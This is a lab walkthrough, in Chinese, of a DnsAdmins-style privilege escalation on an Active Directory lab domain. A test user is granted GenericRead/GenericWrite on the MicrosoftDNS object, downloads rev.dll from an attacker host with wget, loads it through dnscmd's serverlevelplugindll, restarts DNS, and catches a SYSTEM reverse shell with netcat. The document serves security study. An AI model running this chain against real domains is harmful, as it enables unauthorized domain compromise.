whoami
nt authority\system

C:\Windows\system32>

文章中还描述了，即使不是dnsadmin用户组中的用户，只需要用户拥有对 MicrosoftDNS 对象（或其直接子对象）的写入权限，那么它就能获得与 DNSAdmins 组成员相同的、能够导致域管理权限提升的强大能力

返回快照，新建一个测试用户，并不在dnsadmin组中

evil-winrm-py PS C:\Users\Administrator\Documents> New-ADUser -Name "dns-test" -SamAccountName "dns-test" -AccountPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force) -Enabled $true
evil-winrm-py PS C:\Users\Administrator\Documents> Add-ADGroupMember -Identity "Remote Management Users" -Members "dns-test"
    evil-winrm-py PS C:\Users\Administrator\Documents> dsacls "CN=MicrosoftDNS,CN=System,DC=bicker,DC=com" /G "BICKER\dns-test:GRGW"
---------------------------------
❯ evil-winrm -i $ip -u dns-test -p 'P@ssw0rd!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dns-test\Documents>                                whoami /groups

组信息
-----------------

组名                                        类型   SID          属性
=========================================== ====== ============ ==============================
Everyone                                    已知组 S-1-1-0      必需的组, 启用于默认, 启用的组
BUILTIN\Remote Management Users             别名   S-1-5-32-580 必需的组, 启用于默认, 启用的组
BUILTIN\Users                               别名   S-1-5-32-545 必需的组, 启用于默认, 启用的组
BUILTIN\Pre-Windows 2000 Compatible Access  别名   S-1-5-32-554 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NETWORK                        已知组 S-1-5-2      必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users            已知组 S-1-5-11     必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization              已知组 S-1-5-15     必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication            已知组 S-1-5-64-10  必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Plus Mandatory Level 标签   S-1-16-8448

为 BICKER\dns-test 用户授予了对 Active Directory 中 DNS 服务器根对象 CN=MicrosoftDNS,CN=System,DC=bicker,DC=com 的特定权限。

/G "BICKER\dns-test:GRGW" 的含义:

/G: 表示授予权限。

BICKER\dns-test: 权限被授予的主体。

GRGW: 这是 dsacls 命令中表示 Generic Read (通用读取) 和 Generic Write (通用写入) 的缩写组合。

但是对于MicrosoftDNS对象存在通用读取和通用写入权限

访问列表:
允许 BICKER\dns-test  特殊访问
   READ PERMISSIONS #通用读取
   LIST CONTENTS #列出内容
   WRITE SELF #写入自身
   WRITE PROPERTY #属性写入
   READ PROPERTY #属性读取
   LIST OBJECT #列出对象

这也是可是进行dnsadmin热重载攻击的

*Evil-WinRM* PS C:\Users\dns-test\Documents> wget http://192.168.60.100/rev.dll -outFile C:\Users\dns-test\Documents\rev.dll
*Evil-WinRM* PS C:\Users\dns-test\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\dns-test\Documents\rev.dll

注册属性 serverlevelplugindll 成功重置。
命令成功完成。
*Evil-WinRM* PS C:\Users\dns-test\Documents> dnscmd /restart

. 已成功完成。
命令成功完成。
---------------------------
❯ rlwrap nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.128] 50597
Microsoft Windows [汾 10.0.20348.169]
(c) Microsoft Corporation

C:\Windows\system32>